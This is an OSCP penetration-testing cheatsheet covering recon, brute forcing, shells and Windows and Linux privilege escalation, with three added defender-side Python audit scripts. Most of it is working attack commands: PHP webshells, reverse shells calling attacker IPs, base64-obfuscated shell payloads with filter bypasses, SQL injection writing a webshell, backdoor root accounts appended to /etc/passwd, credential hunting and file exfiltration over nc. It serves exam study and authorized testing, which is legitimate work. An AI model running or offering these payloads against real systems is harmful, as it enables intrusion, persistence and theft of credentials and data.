OSCP NOTE (Cheatsheet)


  • If stuck early on, read a walkthrough (WP) one step at a time, then continue on your own
  • After finishing a box, re-read a few walkthroughs to look for new approaches
  • For some exploits, try toggling the trailing / on the URL
  • For some ports, try connecting with both telnet and nc
  • Searching for walkthroughs during the exam: keywords hack the box / tryhackme / ProvingGrounds
  • Run strings on binaries first
  • List directories with ls -al -R (on Windows dir /a or tree /f); don't miss hidden files
  • On an unknown port, connect and try typing help
  • If the site runs WordPress, once inside remember to check the database password in /var/www/html/wp-config.php

Payload pages:
Hack The Planet
Readme - PENETRATION NOTE
swisskyrepo/PayloadsAllTheThings

Essential sites:
HackTricks - HackTricks
Exploit Database
GTFOBins
Online - Reverse Shell Generator

Reconnaissance

nmap

nmap --script vuln 192.168.146.60
nmap -sT -p- --min-rate 10000 10.129.138.220 

UDP scan
nmap -vvv -sU -o nmapudp 10.129.138.220 --max-retries 0
or
nmap -sU --top-ports 10 -sV 10.129.228.106
Specific UDP ports
nmap -p 161,500 -sV -sU -sC 10.129.138.220

21 FTP

# mirror / recursive download
wget -m --no-passive ftp://anonymous:anonymous@192.168.186.145
wget -r -c -nH -np ftp://10.1.1.68/   --ftp-user=steph --ftp-password=billabong
# view a file directly
ftp> more xxxx

80 directory scanning

gobuster dir -u http://192.168.146.71:7331/ -w /usr/share/wordlists/dirb/big.txt -t 500
gobuster dir -u http://192.168.146.54 -w /home/fazx/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt

dirsearch -u http://192.168.234.143/ -r -R 2 -x 404 -w /usr/share/wordlists/dirb/big.txt

# extra wordlist entries worth adding
/cgi-bin/admin.cgi
/api/heartbeat.php

80 FUZZ, API

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 12 http://192.168.146.54/index.php?FUZZ=../location.txt

# pattern file for gobuster -p, one pattern per line:
{GOBUSTER}/v1
{GOBUSTER}/v2
gobuster dir -u http://192.168.250.143 -w /usr/share/wordlists/dirb/big.txt -p pattern

80 wpscan

wpscan --url http://literally.vulnerable:65535/phpcms/ -t 20 --enumerate vt,vp,u (--passwords passwords)

80 hosts / cms

cmseek -u http://192.168.186.145/
whatweb http://192.168.50.244

echo "192.168.146.65    literally.vulnerable" >> /etc/hosts
Some resources won't load; check F12 (dev tools) and edit hosts first

135 RPC

rpcclient -U "" -N 192.168.186.145

for i in $(seq 500 1100); do
    rpcclient -N -U "" 192.168.186.145 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
done

161 SNMP udp

snmp-check "192.168.233.145" -c public
snmpwalk -c public -v1 192.168.210.149
snmpbulkwalk -c public -v2c 10.10.11.136 .
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

445 smb

crackmapexec smb 192.168.186.145
crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
crackmapexec smb ip -u 'anonymous' -p 'anonymous' --users

smbclient -N -L //192.168.186.145
smbclient -L //172.16.210.83/ -U medtech.com/wario --pw-nt-hash
smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator

impacket-psexec -hashes 00000000000000000000000000000000:e728ecbadfb02f51ce8eed753f3ff3fd celia.almeda@10.10.140.142

1433 MSSQL

crackmapexec mssql ip -u sa -p pass --local-auth -x 'whoami'
impacket-mssqlclient sql_svc:Dolphin1@10.10.100.148 -windows-auth
sqsh -U sa -P poiuytrewq  -S 10.11.1.31:1433 

a'+or+'a'='a'+;exec+master..xp_cmdshell+'ping+192.168.119.169'--

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell 'whoami'

3389 RDP

Connect

xfreerdp /u:test /p:123 /v:10.10.100.148 /cert:ignore -wallpaper /drive:kali,/root/Desktop/exp/temp

# config file
/u:mac
/p:IAmTheGOATSysAdmin!
/v:192.168.126.221
/cert:ignore
/drive:kali,/root/Desktop/exp

Enable RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net stop termservice && net start termservice

LFI

Approach: read /etc/passwd to get usernames, then read the private key from the user's home directory: /home/user/.ssh/id_rsa
If the argument name is something like view, file, page, skin, theme, lang or template, file inclusion is highly likely

?page=php://filter/convert.base64-encode/resource=view.php

Windows LFI files
https://notchxor.github.io/oscp-notes/4-win-privesc/15-LFI-FILES/

Brute forcing

Wordlists

/usr/share/dirb/wordlists/common.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wfuzz/wordlist/general/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Hydra

hydra -l pinky -P /usr/share/dirb/wordlists/common.txt 192.168.146.54 -s 7654 http-post-form '/login.php:user=^USER^&pass=^PASS^:F=Invalid'

hydra -l admin -P /home/fazx/SecLists/Passwords/2020-200_most_used_passwords.txt "ignition.htb" http-post-form "/admin:form_key=WaEWxk61HqTZyMVP&login%5Busername%5D=admin&login%5Bpassword%5D=^PASS^:please sign in" -V

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.146.55 ssh

hydra -L /usr/share/wordlists/chaoji/dic_username_ftp.txt -P /usr/share/wordlists/chaoji/dic_password_ftp.txt 192.168.146.80 ftp 

hydra 192.168.146.60 -P /usr/share/wordlists/rockyou.txt http-post-form '/kzMb5nVYJw/index.php:key=^PASS^:invalid' -l a   # the username does not matter here, so just pass 'a'

hydra -l postgres -P /usr/share/wordlists/rockyou.txt 192.168.234.143 postgres

wpscan

wpscan --url http://127.0.0.1:1337/wordpress/ --wp-content-dir wp-content/ --proxy http://192.168.247.148:8080 --no-banner -U jerome -P /usr/share/wordlists/rockyou.txt

wpscan --url http://192.168.50.244 --enumerate ap --plugins-detection aggressive

aggressive mode finds more plugins; p is popular, vp vulnerable, ap all

samba

Enumerate users:
enum4linux -U 192.168.3.142
Brute-force the password
./acccheck.pl -t 192.168.3.142 -u smb -v
Log in and look around
smbclient //192.168.3.142/smb -U smb

zip

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt sitebackup3.zip -v

zip2john sitebackup3.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt 

getshell

webshell

<?php system($_GET['cmd']); ?>
<?php echo passthru($_GET['cmd']);

Writing a shell via UNION injection

1' UNION SELECT 1,2,3,("<?php echo passthru($_GET['cmd']);") INTO OUTFILE '/var/www/html/tmp/123.php'#

Reverse shell

https://www.revshells.com/
cme (crackmapexec) is more reliable for executing PowerShell commands

# busybox nc as a fallback when nc -e / nc -c is unavailable
busybox nc 192.168.146.55 8888 -e sh
# php one-liner reverse shell
<?php $sock = fsockopen("192.168.146.55",8888); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
# windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=3306 -f exe > evil.exe 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.164 LPORT=21 -f exe > 21.exe
php -r '$sock=fsockopen("192.168.146.58",8888);exec("/bin/sh -i <&3 >&3 2>&3");'

echo "echo cGhwIC1yICckc29jaz1mc29ja29wZW4oIjE5Mi4xNjguMTQ2LjU4Iiw4ODg4KTtwb3BlbigiL2Jpbi9iYXNoIDwmMyA+JjMgMj4mMyIsICJyIik7Jw== | base64 -d" >> ../write.sh

echo "php -r '\$sock=fsockopen(\"192.168.146.58\",8888);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" >> write.sh

?plot=;curl http://192.168.86.99/rshell443.txt --output rshell443.php

nc 192.168.146.55 9999 | /bin/bash | nc 192.168.146.55 8888

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe > 443.exe

socat fully interactive shell

kali:   socat file:`tty`,raw,echo=0 tcp-listen:8888
target: ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.146.55:8888

python semi-interactive shell

# semi-interactive shell, run on the target
python -c 'import pty; pty.spawn("/bin/bash")' 
python3 -c 'import pty; pty.spawn("/bin/bash")' 

Upgrade to a fully interactive shell with stty

# fully interactive
# On Kali, a zsh terminal under GNOME has a problem: Enter becomes ^M and the shell is unusable,
# so first run bash to get back to a plain terminal
# In Kali
$ bash

# In reverse shell 
$ python -c 'import pty; pty.spawn("/bin/bash")' 
Ctrl-Z

# In Kali 
$ stty raw -echo 
$ fg 

# In reverse shell 
$ reset
If it asks Terminal type?, you can enter xterm-256color, but then vi may not show any text,
so usually just use xterm or dumb    (check with echo $TERM)

Windows privilege escalation

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#ssh-keys-in-registry
https://benheater.com/thm-windows-privesc/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://zhuanlan.zhihu.com/p/428516577

Check privileges first

whoami /all

SeImpersonatePrivilege

PrintSpoofer64.exe -i -c cmd.exe
.\PrintSpoofer64.exe -i -c cmd.exe
PrintSpoofer64.exe -i -c "powershell.exe -e JABjAGwAa..."
certutil.exe -urlcache -split -f "http://192.168.45.234/PrintSpoofer64.exe"

Check services

certutil.exe -urlcache -split -f "http://192.168.45.164/PowerUp.ps1"
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell -exec bypass -Command "Import-Module .\PowerUp.ps1;Invoke-AllChecks"

schtasks /query /fo LIST /v
icacls "%ProgramFiles%\RUXIM\PLUGscheduler.exe"

accesschk.exe /accepeula -uwcqv "user"

Service unquoted path

powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"  # this adds a user directly (john / Password123!), convenient
Restart-Service GammaService

Check for vulnerabilities

Winpeas

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://192.168.49.133/winPEASany.exe','c:\Users\rupert\Desktop\wp.exe')"

AlwaysInstallElevated MSI Abuse

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

When both are 1, an MSI run by a normal user executes with SYSTEM privileges

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.79 LPORT=443 -f msi > ~/Desktop/exp/shell443.msi
Just run the msi; the silent install command is below
msiexec /quiet /qn /i C:\Temp\setup.msi

Manually look for other information

SauronEye.exe -d C:\Users\ --filetypes .txt .xml .conf .log --contents --keywords password
type C:\Users\wario\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# find the PowerShell history file
dir /s /b "ConsoleHost_history.txt"

# ssh
reg query "HKCU\Software\OpenSSH\Agent\Keys"

Linux privilege escalation

LinPEAS

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget http://192.168.146.55/linpeas.sh

Pspy

# continuously monitor processes, complements linpeas
wget https://hub.nuaa.cf/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

Scheduled tasks (cron)

grep "CRON" /var/log/cron.log
cat /etc/crontab

/etc/passwd

openssl passwd evil
echo "root2:EyCPXNrY/E2XE:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "root4::0:0::/root:/bin/bash" >> /etc/passwd
Cannot log in via ssh; only su to it from an existing shell
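Added example, not from the original note: a defender-side audit of /etc/passwd that flags the two backdoor styles shown above (an extra uid-0 account, an empty password field, and a hash stored directly in passwd instead of /etc/shadow). The sample file is constructed for the example.

```python
# Added example (not from the original note): audit /etc/passwd for the two
# backdoor styles shown above: extra uid-0 accounts, an empty password field,
# and a hash stored directly in passwd instead of /etc/shadow.

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
root2:EyCPXNrY/E2XE:0:0:root:/root:/bin/bash
root4::0:0::/root:/bin/bash
"""  # constructed sample; the last two lines mirror the note's echo commands

# values that mean "password lives in /etc/shadow" or "login disabled"
SHADOW_MARKERS = ("x", "*", "!", "!!")


def audit_passwd(text):
    """Return a list of (account, reason) for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 but not root"))
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in SHADOW_MARKERS:
            findings.append((name, "password hash stored in passwd instead of shadow"))
    return findings


if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
```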


SUID

#Find all SUID binaries
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
(-perm 4000 corresponds to -rws)

# (may require the current user's password; this is defined in /etc/sudoers)
sudo -ll  # check commands you can execute with sudo
# list the user's privileges or check a specific command; use -l twice for the longer format

https://tttang.com/archive/1793/

Special files

There may be scheduled tasks you cannot see; you have to guess which files they use and modify them

# find files owned by a given user
find / -user demon 2>/dev/null | grep -Ev '/proc|/sys|/user'
find / -user www-data -ls 2>/dev/null | (grep -v proc)
# find writable files
find / -writable 2>/dev/null | grep -v proc
# remember find -name is an exact match, so quote the wildcards
find / -name '*penguin*'

searchsploit

grep PRETTY /etc/os-release
searchsploit linux kernel ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/45010.c ./
gcc 45010.c -o 45010

Privilege escalation by overriding PATH

cd /tmp
echo "/bin/sh" > ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoami


Pwnkit

https://github.com/arthepsy/CVE-2021-4034

user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc

It's all about the version.

According to https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py versions below these are vulnerable:
Ubuntu 20.04: 0.105-26ubuntu1.2
Ubuntu 21.10: 0.105-31ubuntu0.1
Ubuntu 18.04: 0.105-20ubuntu0.18.04.6
Debian stretch: 0.105-18+deb9u2
Debian buster: 0.105-25+deb10u1
Debian bullseye: 0.105-31+deb11u1
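Added example, not from the original note or from the PwnKit-Hunter script: a defender-side version check that implements dpkg's version ordering so an installed policykit-1 version can be compared with the fixed versions listed in the table above. The distribution names and fixed versions are copied from the table; the function names are mine.

```python
# Added example (not from the original note): a defender-side check that compares
# an installed policykit-1 version with the fixed versions in the table above,
# using dpkg's ordering ('~' first, letters before symbols, digit runs numeric).
import re

FIXED_POLKIT = {  # values copied from the note above
    "Ubuntu 20.04": "0.105-26ubuntu1.2",
    "Ubuntu 21.10": "0.105-31ubuntu0.1",
    "Ubuntu 18.04": "0.105-20ubuntu0.18.04.6",
    "Debian stretch": "0.105-18+deb9u2",
    "Debian buster": "0.105-25+deb10u1",
    "Debian bullseye": "0.105-31+deb11u1",
}

def _weight(c):
    """dpkg weight of a non-digit character: '~' < end-of-string < letters < others."""
    if c == "~":
        return -1
    return ord(c) if c.isalpha() else ord(c) + 256

def _key(s):
    """Split into (non-digit run, digit run) pairs; the trailing 0 in each run
    tuple stands for end-of-string so that 'a~' < 'a' < 'ab'."""
    return [(tuple(_weight(c) for c in nd) + (0,), int(d or 0))
            for nd, d in re.findall(r"(\D*)(\d*)", s) if nd or d]

def _cmp_part(a, b):
    ka, kb = _key(a), _key(b)
    n = max(len(ka), len(kb))
    ka += [((0,), 0)] * (n - len(ka))          # missing runs compare as empty
    kb += [((0,), 0)] * (n - len(kb))
    return (ka > kb) - (ka < kb)

def dpkg_compare(v1, v2):
    """Return -1, 0 or 1 as v1 is older than, equal to or newer than v2."""
    def split(v):                              # [epoch:]upstream[-revision]
        epoch, _, rest = v.partition(":") if ":" in v else ("0", "", v)
        upstream, _, rev = rest.rpartition("-") if "-" in rest else (rest, "", "")
        return int(epoch), upstream, rev
    (e1, u1, r1), (e2, u2, r2) = split(v1), split(v2)
    if e1 != e2:
        return (e1 > e2) - (e1 < e2)
    return _cmp_part(u1, u2) or _cmp_part(r1, r2)

def polkit_vulnerable(distro, installed):
    """True when the installed policykit-1 predates the fix for that release."""
    return dpkg_compare(installed, FIXED_POLKIT[distro]) < 0
```

Feed it the output of `dpkg-query -W -f '${Version}' policykit-1` together with the release name from /etc/os-release.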

lxd privilege escalation

You must be in the lxd group, and lxc must be installed
https://reboare.github.io/lxd/lxd-escape.html
https://windsorwebdeveloper.com/web-developer-1-vulnhub-walkthrough/

ubuntu@ubuntu:~$ lxd init   (accept the defaults, press Enter all the way through)
ubuntu@ubuntu:~$ lxc init ubuntu:16.04 test -c security.privileged=true 
Creating test 
ubuntu@ubuntu:~$ lxc config device add test whatever disk source=/ path=/mnt/root recursive=true 
Device whatever added to test 
ubuntu@ubuntu:~$ lxc start test 
ubuntu@ubuntu:~$ lxc exec test bash 

NFS privilege escalation

The folder exported in /etc/exports must have the no_root_squash option

(in Kali)
# showmount -e 192.168.146.60
Export list for 192.168.146.60:
/home/user5 *
# mkdir nfstmp
# mount -t nfs 192.168.146.60:/home/user5 nfstmp
# cd nfstmp
# cp /bin/sh ./nfsh
# chmod +s nfsh
(on the target)
# ./nfsh -p

After mounting the share, drop a SUID file and then escalate. In practice, whether you copy bash, compile a C program or write Python, the resulting process ends up with euid != uid, in which case it actually runs with the uid's privileges and the escalation fails; so run sh with -p so that it does not reset the euid.
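Added example, not from the original note: an exports(5) parser that lists the exports where root squashing is disabled, the precondition for the SUID trick above, including the classic "host (opts)" whitespace pitfall. The sample exports file is constructed; quoted paths containing spaces are not handled.

```python
# Added example (not from the original note): parse an exports(5) file and list
# the exports that disable root squashing, the precondition for the SUID trick
# above. The sample file is constructed; quoted paths with spaces are not handled.

SAMPLE_EXPORTS = """\
# constructed sample exports file
/home/user5 *(rw,sync)
/srv/share 10.0.0.0/24(rw,no_root_squash) *(ro)
/srv/backup admin-host (rw,no_root_squash)
/srv/data 10.0.0.5(rw,all_squash) \\
          10.0.0.6(rw,root_squash)
"""

SQUASH_OPTS = ("root_squash", "no_root_squash", "all_squash")


def parse_exports(text):
    """Yield (path, client, [options]) for every client entry in the file."""
    text = text.replace("\\\n", " ")            # join continuation lines
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *entries = line.split()
        for entry in entries:
            client, _, opts = entry.partition("(")
            # "host (opts)" with a space exports to host with defaults and
            # applies opts to everyone: the classic exports(5) pitfall
            if not client:
                client = "*"
            yield path, client, [o for o in opts.rstrip(")").split(",") if o]


def no_root_squash_exports(text):
    """Return [(path, client)] where root is not squashed."""
    findings = []
    for path, client, opts in parse_exports(text):
        squash = "root_squash"                  # exportfs default
        for opt in opts:
            if opt in SQUASH_OPTS:
                squash = opt                    # last one wins
        if squash == "no_root_squash":
            findings.append((path, client))
    return findings


if __name__ == "__main__":
    for path, client in no_root_squash_exports(SAMPLE_EXPORTS):
        print(f"{path} exported to {client} with no_root_squash")
```

Keeping the exportfs default root_squash, and mounting NFS shares client-side with nosuid, defeats the SUID copy trick.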

Lateral movement in the domain

(placeholder)

Setting up a tunnel

On Kali
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

kali:
./proxy -selfcert

target:
agentw64.exe -connect 192.168.119.166:11601 -ignore-cert 

kali:
>session
>ifconfig

In another terminal:
ip route add 10.10.56.0/24 dev ligolo    # 10.10.56.0/24 is the subnet you want to reach

>start

Port forwarding (at the ligolo prompt):
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp 
forwards the target's port 1234 to Kali's port 4321

listener_add --addr 127.0.0.1:80 --to 0.0.0.0:80 --tcp 
forwards Kali's port 80 to the target's port 80

Note that 0.0.0.0 stands for the agent's address,
and 127.0.0.1 stands for Kali's address; there is no need to substitute IPs, use them as written

Files

Writing files

$ cat > test.c
#include <unistd.h>
#include <sys/stat.h>
void __attribute__((constructor)) init (void)
{
    chown("/tmp/test", 0, 0);
    chmod("/tmp/test", 04755);
}
^D

cat > 2.txt <<EOF
this is test
this is test
this is test
EOF

Writing a public key

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdubHNkqPbAwD0ikkAKCWcEmxDNokB4gYle0ioj/NC/PA6wQjHRFOA32H/xGS1aGuTv3+xe9d7F4m6QuhZytNJ6QeVchqnf6zqg+0XlRyNxA3SUVxl2j+8fMgHeA92QqfWoIcknH/CaEWo5ZQTrSL4+A0hX2c7xMy2RyU4LEYxY3pEy9LayHmaqjHd3CKaeiDDDyEhSuGNPn1xPAOLB4h4idk88Ih50tu6rbl0hk/rEUCFYTTsWNtVy1u+uGAqimHv0xsYKQux1JLkymKYERXwTxSmNjK0Bx/d5IrI4oh4iUfnxqsvwcG6Sb6sKFwlhYypNgRr6zU3eZMltsSlc10j root@kali" > .ssh/authorized_keys

File transfer

nc.exe 192.168.45.201 80 < "C:\Users\offsec\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt"
nc -lp 80 > pass.txt

scp C:\windows.old\windows\system32\SAM root@10.10.100.147:/root/Desktop/

kali> impacket-smbserver myshare ./ -smb2
net use M: \\10.10.100.147:4455\myshare
cp a.exe M:

File download

certutil.exe -urlcache -split -f "http://192.168.45.234/PrintSpoofer64.exe"

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://192.168.49.133/winPEASany.exe','c:\Users\rupert\Desktop\wp.exe')"

Searching file contents

$ grep -R ".trash_old" /var/ 2>/dev/null
/var/spool/cron/crontabs/root:* * * * * /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

find / -type f | xargs grep tmp.py

Misc

Python virtualenv

virtualenv .
source ./bin/activate
deactivate

searchsploit

searchsploit -u # update the database
searchsploit -m 50505 # copy the exploit to the current directory
searchsploit -x 50505 # view the exploit contents

Bypasses

/bin/ech? bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEwMyA2NjY2ICAK|/u?r/b?n/b?se64 -d|/bin/?h

echo+YnVzeWJveCBuYyAxOTIuMTY4LjE0Ni41NSA4ODg4IC1lIC9iaW4vYmFzaA==+|+base64+-d|sh

-t 'bash --noprofile'  to bypass rbash

base64

# encode the command
echo "ls -l" | base64

# decode the command and execute it
echo bHMgLWwK | base64 -d | sh